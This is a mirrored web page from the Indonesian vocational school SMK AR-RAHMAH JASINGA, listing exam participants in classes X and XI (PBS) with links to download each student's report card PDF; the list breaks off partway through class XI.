<!DOCTYPE html>
<html lang="en">
	

<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
		<!-- Meta -->
		<meta charset="utf-8">
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    	<meta name="theme-color" content="#3fa044">
				<meta name="description" content="Penerimaan siswa baru SMK AR-RAHMAH JASINGA">
		<meta name="author" content="Ubaedilah -ubaedilah.0203@gmail.com">
		<meta name="keywords" content="Penerimaan siswa baru SMK AR-RAHMAH JASINGA">
		<meta name="robots" content="all">
		<title>PAT 2020 SMK AR-RAHMAH JASINGA</title>		
	    <!-- Bootstrap Core CSS -->
	    <link rel="stylesheet" href="../use.fontawesome.com/releases/v5.8.2/css/all.css">
	    <link rel="stylesheet" href="theme/iuqi/css/bootstrap.min.css">
	    <link rel="stylesheet" href="theme/iuqi/css/mdb.min.css">
		<link rel="stylesheet" href="theme/iuqi/css/style.min.css">
		<style type="text/css">
	      html,
	      body,
	      header,
	      .carousel {
	        height: 79vh;
	      }
	      
	      

	      @media (max-width: 740px) {
	        html,
	        body,
	        header,
	        .carousel {
	          height: 100vh;
	        }
	      }

	      @media (min-width: 800px) and (max-width: 850px) {
	        html,
	        body,
	        header,
	        .carousel {
	          height: 100vh;
	        }
	      }

	      @media (min-width: 800px) and (max-width: 850px) {
	              .navbar:not(.top-nav-collapse) {
	                  background: #1C2331!important;
	              }
	          }

	      .navbar-default .navbar-nav > li.dropdown:hover > a, 
	      .navbar-default .navbar-nav > li.dropdown:hover > a:hover,
	      .navbar-default .navbar-nav > li.dropdown:hover > a:focus {
	          background-color: rgb(231, 231, 231);
	          color: rgb(85, 85, 85);
	      }
	      li.dropdown:hover > .dropdown-menu {
	          display: block;
	      }

	      .dropdown-item:hover {
	        background-color: rgb(231, 231, 231);
	        color: #93a3fb;/*rgb(85, 85, 85);*/
	      }
	      .dropdown-menu{
	        border-radius:2px;
	        border:1px solid #e6e6e6;
	      }

	      .card-body {
	          background-color: rgba(255,255,255,.2);
	          padding: 2rem;
	      }

	      .container-fluid {
	          width: 100%;
	          padding-right: 15px;
	          padding-left: 15px;
	          margin-right: auto;
	          margin-left: auto;
	      }

	      .font-small{
			    font-size: .82rem;
			}

			.md-pills .nav-link {
			    -webkit-transition: all .4s;
			    -o-transition: all .4s;
			    transition: all .4s;
			    -webkit-border-radius: 2px;
			    border-radius: 2px;
			    color: #666;
			    text-align: center;
			}

			.nav-link {
			    display: block;
			    padding: .5rem 1rem;
			}

			
	    </style>
		
		
		<!-- Favicon -->
		<link rel="shortcut icon" href="upload/logo/icon/favicon.ico">

		<!-- HTML5 elements and media queries Support for IE8 : HTML5 shim and Respond.js -->
		<!--[if lt IE 9]>
			<script src="assets/js/html5shiv.js"></script>
			<script src="assets/js/respond.min.js"></script>
		<![endif]-->
		    <!-- JQuery -->
    	<script type="text/javascript" src="theme/iuqi/js/jquery-3.4.1.min.js"></script>

		
	</head>
<body>
    <!-- Navbar -->
  <nav class="navbar fixed-top navbar-expand-lg navbar-dark scrolling-navbar">
    <div class="container">
       <!-- Navbar brand -->
        <a class="navbar-brand" href="https://smkarrahmah195.github.io/" title="SMK AR-RAHMAH JASINGA">
          <img src="upload/logo/icon/2.png">
        </a>
      <!-- Collapse button -->
      <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#basicExampleNav"
        aria-controls="basicExampleNav" aria-expanded="false" aria-label="Toggle navigation">
        <span class="navbar-toggler-icon"></span>
      </button>

      <!-- Collapsible content -->
      <div class="collapse navbar-collapse" id="basicExampleNav">

        <!-- Links -->
        <ul class="navbar-nav mr-auto">
          <li class="nav-item ">
            <a class="nav-link" href="home.html"> <i class="fa fa-home"></i> HOME
              <span class="sr-only">(current)</span>
            </a>
          </li>
         
          <li class="nav-item active">
            <a class="nav-link" href="berita.html"> Nama peserta ujian
            </a>
          </li>
          
          <li class="nav-item ">
            <a class="nav-link" href="go.html">Jadwal pelajaran
            </a>
          </li>
           <li class="nav-item ">
            <a class="nav-link" href="kelasx.html">BANK SOAL KELAS X (PBS)
            </a>
          </li>
           <li class="nav-item ">
            <a class="nav-link" href="kelasxi.html">BANK SOAL KELAS XI(PBS)
            </a>
          </li>
          
        </ul>
          
        <!-- Links -->

        <!--<form class="form-inline">
          <div class="md-form my-0">
            <input class="form-control mr-sm-2" type="text" placeholder="Search" aria-label="Search">
          </div>
        </form>-->
      </div>
      <!-- Collapsible content -->
    </div>
  </nav>

  <!-- Navbar --><!-- Intro Section -->
  <style type="text/css">
  	body{
  		background-color:#f7f7f7;
    }
  </style>

  <div id="home"  class="view jarallax" data-jarallax='{"speed": 0.2}' style="background-image: url(upload/banner/up.jpg); background-repeat: no-repeat; background-size: cover; background-position: center center; height: 40vh;">
    <div class="mask rgba-Floral White-strong">
      <div class="container h-100 d-flex justify-content-center align-items-center">
        <div class="row smooth-scroll">
          <div class="col-md-12 white-text text-center">
            <div class="animated swing infinite" data-wow-delay="0.2s"><br><br><br>
              <h2 class="subtext-header"><span style="color: red; font-family: Georgia; font-size: 35px;">
              	NAMA PESERTA UJIAN</span>
              </h2>
              <p>KELAS X (PBS) DAN KELAS XI (PBS) SMK AR-RAHMAH JASINGA</p>
            </div>

          </div>
        </div>
      </div>
    </div>
  </div>
 <body>
<!-- END MAIN NAVIGATION -->
          </nav> 
        </div>
      </div>    
  
  
   <div class="col-md-12" style="border-top:4px solid #025B6D; background:#10af04; margin-bottom:20px;">
    <div class="foxukuran90" style="background:#fff; margin:20px auto;  border:1px solid #ccc;">
      <div class="col-md-12 " style="background:#036A7F;">
        <div class="col-md-12"  style="background:#036A7F;">
          <table >
            <tr>
              <td >
                <center>
                  <img class="gambarhover" src="upload/Profil/I.png" style=" width:80px; padding:10px;">
                </center>
              </td>
              <td style="width:89%;">
                <p style="color:#fff; margin:0px; padding:0px; font-weight:bold; font-size:13px;">
                  NAMA DAN NOMOR PESERTA UJIAN SMK AR-RAHMAH JASINGA
                </p>
                <p style="margin:0px; padding:5px 0px; color:#fff; font-size:10px;">
                  Tanggal Terbit : 4 April 2021
                </p>
                <p style="margin:0px; padding:0px; color:#fff; font-size:10px;">
                  Dibuat Oleh : Admin SMK AR-RAHMAH JASINGA
                </p>
              </td>
              <td style="padding-right:10px; z-index:99; position:relative;">
              
              </td>
            </tr>
          </table>
        </div>
      </div>
      <div style="clear:both;"></div>
      <div class="col-md-12" style="padding:30px; background:#fff;">
                  <div class="col-md-12 scrolltable" style="padding:1%; overflow-x:scroll; " >
          <center>
            <img src="upload/logo/icon/3.png" style="height:100px;">
          </center>
         <br>
          <p style="font-size: 12px; text-align: center;">
          DAFTAR PESERTA UJIAN KELAS X (PBS) :
          </p>
          <table class="table table-striped" style="color:#000; font-size:12px;text-align: center; ">
            <tr>
              <th>NOMOR</th>
              <th>NAMA</th>
              <th>KELAS</th>
              <th>PERINGKAT</th>
              <th>Download Raport</th>
            </tr>
            <tr>
              <td>1</td>
              <td>ADI MAULANA</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/adi.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>2</td>
              <td>ADE MIFTAHUSHOLAH</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/ade.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>3</td>
              <td>ADI ROHMAN</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/adirohman.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>4</td>
              <td>AJI MAHARDIKA</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/aji.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>5</td>
              <td>ALIFIA</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/alifia.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>6</td>
              <td>ANDI SUKANDI</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/andi.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>7</td>
              <td>ANISAH</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/anisah.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>8</td>
              <td>DADAN</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/dadan.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>9</td>
              <td>DEWI SARTIKA</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/dewi.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>10</td>
              <td>HANI</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/hani.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>11</td>
              <td>KHOERUNNISA</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/ica.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>12</td>
              <td>M.FITROH</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/pitroh.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>13</td>
              <td>M.HARUN</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/harun.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>14</td>
              <td>M.REZA</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/reza.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>15</td>
              <td>M.SUHENDI</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/suhendi.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>16</td>
              <td>M. WILDAN</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/wildan.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>17</td>
              <td>NELLY AGUSTIN</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/nely.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>18</td>
              <td>PITRI AWALIYAH</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/pitri.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>19</td>
              <td>PUTRI AYU</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/putriayu.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>20</td>
              <td>RAFLI HIDAYAT</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/rapli.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>21</td>
              <td>RINA</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/rina.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>22</td>
              <td>ROSINAH</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/rosinah.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>23</td>
              <td>SALSABILA</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/salsabila.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>24</td>
              <td>SAPARIYAH</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/sapariyah.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>25</td>
              <td>SARAH</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/sarahnadila.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>26</td>
              <td>SELLA BELLA</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/sella.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>27</td>
              <td>SENIA</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/senia.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>28</td>
              <td>SILVIA</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/silvia.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>29</td>
              <td>SINTA BELLA</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/sinta.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>30</td>
              <td>SITI NURHAZIZAH</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/nurhazizah.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>31</td>
              <td>WILIAM STEVEN</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/wili.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>32</td>
              <td>SULASIAH</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/sulas.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>33</td>
              <td>THOMAS</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/tomas.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>34</td>
              <td>HADI WIRAKUSMA</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/hadi.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>35</td>
              <td>SRI AINUL</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/sri.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
		     
	<tr>
              <td>34</td>
              <td>M.BAGAS PRATAMA</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasx/bagas.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
    
          </table>
          </div>
          
      </div>
      <div class="col-md-12">
        
      </div>
    </div>
    <!-- tutup -->
    <br>
    <br>
    <br>
    
          <div class="col-md-12" style="border-top:4px solid #025B6D; background:#10af04; margin-bottom:20px;">
    <div class="foxukuran90" style="background:#fff; margin:20px auto;  border:1px solid #ccc;">
      <div class="col-md-12 " style="background:#036A7F;">
        <div class="col-md-12"  style="background:#036A7F;">
          <table >
            <tr>
              <td >
                <center>
                  <img class="gambarhover" src="upload/Profil/I.png" style=" width:80px; padding:10px;">
                </center>
              </td>
              <td style="width:89%;">
                <p style="color:#fff; margin:0px; padding:0px; font-weight:bold; font-size:13px;">
                  NAMA DAN NOMOR PESERTA UJIAN SMK AR-RAHMAH JASINGA
                </p>
                <p style="margin:0px; padding:5px 0px; color:#fff; font-size:10px;">
                  Tanggal Terbit : 4 April 2021
                </p>
                <p style="margin:0px; padding:0px; color:#fff; font-size:10px;">
                  Dibuat Oleh : Admin SMK AR-RAHMAH JASINGA
                </p>
              </td>
              <td style="padding-right:10px; z-index:99; position:relative;">
              
              </td>
            </tr>
          </table>
        </div>
      </div>
      <div style="clear:both;"></div>
      <div class="col-md-12" style="padding:30px; background:#fff;">
                  <div class="col-md-12 scrolltable" style="padding:1%; overflow-x:scroll; " >
          <center>
            <img src="upload/logo/icon/3.png" style="height:100px;">
          </center>
         <br>
          <p style="font-size: 12px; text-align: center;">
          DAFTAR PESERTA UJIAN KELAS XI (PBS) :
          </p>
          <table class="table table-striped" style="color:#000; font-size:12px;text-align: center; ">
            <tr>
              <th>NOMOR</th>
              <th>NAMA</th>
              <th>KELAS</th>
              <th>PERINGKAT</th>
              <th>Download Raport</th>
            </tr>
            <tr>
              <td>1</td>
              <td>Ai silvi sya'bani</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/AI.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>2</td>
              <td>ANANDA FARHA</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/FARHA.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>3</td>
              <td>ARDIANSYAH</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/ARDIANSYAH.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>4</td>
              <td>ARIS</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/ARIS.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>5</td>
              <td>AZIS</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/AZIS.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>6</td>
              <td>BAYU AFANDI</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/BAYU.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>7</td>
              <td>DESI HERAWATI</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="index.html">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>8</td>
              <td>EDI FAUZI</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/EDI.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>9</td>
              <td>ELLY FRANSISCA</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/ELLY.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>10</td>
              <td>ELZA</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/ELZA.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>11</td>
              <td>GUGUN</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/GUGUN.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>12</td>
              <td>HAERUL</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/HAERUL.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>13</td>
              <td>HOLIL</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/HOLIL.pdf">
